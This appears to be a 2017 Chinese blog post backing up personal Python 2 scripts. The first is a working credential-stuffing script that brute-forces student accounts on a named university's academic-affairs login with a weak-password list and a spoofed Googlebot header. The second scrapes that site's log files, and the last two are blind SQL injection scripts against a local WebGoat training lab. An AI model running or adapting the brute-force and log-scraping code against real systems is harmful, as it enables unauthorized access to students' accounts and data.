python脚本备份
18 Jun 2017
|
正方教务系统弱口令
#coding:utf-8
import requests
url = 'http://zfjw.tjykdxlcyxy.cn/(2izend4512fei5nhksssaw45)/default4.aspx'#天津医科大学临床医学院 正方教务处
#username = 1604020408
weak = ['000000',
'111111',
'222222',
'333333',
'444444',
'555555',
'666666',
'777777',
'888888',
'999999',
'123456',
'654321',
'qweqwe',
'123123'
]
for i in range(1604020000,1604029999):
for j in weak:
username = str(i)
print username
passwd = str(j)
data = {
"__VIEWSTATE":"dDwxMTE4MjQwNDc1Ozs+/qN9q0GVi7WN0iH/jz8h6QhLSvg=",
"TextBox1":username,
"TextBox2":passwd,
"RadioButtonList1":"学生",
"Button1":" 登 录 "
}
#cookies = {}
headers = {"Host":"zfjw.tjykdxlcyxy.cn",
"User-Agent":"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Referer":"http://zfjw.tjykdxlcyxy.cn/(2izend4512fei5nhksssaw45)/default4.aspx",
"Cookie":"safedog-flow-item=",
}
req = requests.post(url=url,data=data,headers=headers)
#print req.content
if req.content.find('alert') == -1:
f = open(username+'_'+passwd+'.txt','w')
print >> f,req.content
#print req.content
f.close()
正方教务处日志下载
import requests
import datetime
begin = datetime.date(2017,5,1)
end = datetime.date(2017,5,1)
for i in range((end - begin).days+1):
day = begin+datetime.timedelta(days=i)
url = 'http://zfjw.tjykdxlcyxy.cn/log/%s-log.txt'%str(day)
#print url
req = requests.get(url)
#print req.content
if req.content.find('passwd') == -1:
print day
f = open(str(day)+".txt","w")
print >> f,req.content
f.close()
ida高亮call指令
from idautils import *
from idc import *
heads = Heads(SegStart(ScreenEA()),SegEnd(ScreenEA()))
functionCalls = []
for i in heads:
if GetMnem(i) == "call":
functionCalls.append(i)
print "Number of calls found: %d"%(len(functionCalls))
for i in functionCalls:
SetColor(i,CIC_ITEM,0xc7fdff)
WebGoat数字盲注
import re
import requests
import time
cookies = dict(JSESSIONID='A9DDDE87B8D317640143AD42C8AB0CFB')
url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'
#payload = "101 and 1=2"
low = 0
high = 10000
mid = 5000
payload = "101 and ((select pin from pins where cc_number='1111222233334444')="+str(mid)+")"
print payload
data = {'account_number':payload,'SUBMIT':'Go!'}
req = requests.post(url=url,data=data,cookies=cookies)
print req.content
while low <= high:#采用二分法查找
mid = (low+high)/2
payload = "101 and ((select pin from pins where cc_number='1111222233334444')="+str(mid)+")"
print payload
data = {'account_number':payload,'SUBMIT':'Go!'}
req = requests.post(url=url,data=data,cookies=cookies)
if req.content.find('Account number is valid.') != -1:
print 'succeed:'+str(mid)
break
time.sleep(1)
payload = "101 and ((select pin from pins where cc_number='1111222233334444')>"+str(mid)+")"
data = {'account_number':payload,'SUBMIT':'Go!'}
req = requests.post(url=url,data=data,cookies=cookies)
print req.content
if req.content.find('Invalid account number.') != -1:
high = mid-1
elif req.content.find('Account number is valid.') != -1:
low = mid+1
print 'it\'s over,not found!'
WebGoat字符串盲注
import re
import requests
import time
cookies = dict(JSESSIONID='A9DDDE87B8D317640143AD42C8AB0CFB')
url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'
#payload = "101 and 1=2"
charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
k = 1
for j in range(0,5):
for i in charset:
payload = "101 and (substring((select name from pins where cc_number='4321432143214321'),%d,1)='%c')"% (k,i)
#print payload
data = {'account_number':payload,'SUBMIT':'Go!'}
req = requests.post(url=url,data=data,cookies=cookies)
#print req.content
if req.content.find('Invalid account number') != -1:
continue
elif req.content.find('Account number is valid.') != -1:
print i,
k = k+1
print ''
print 'it\'s over,not found!'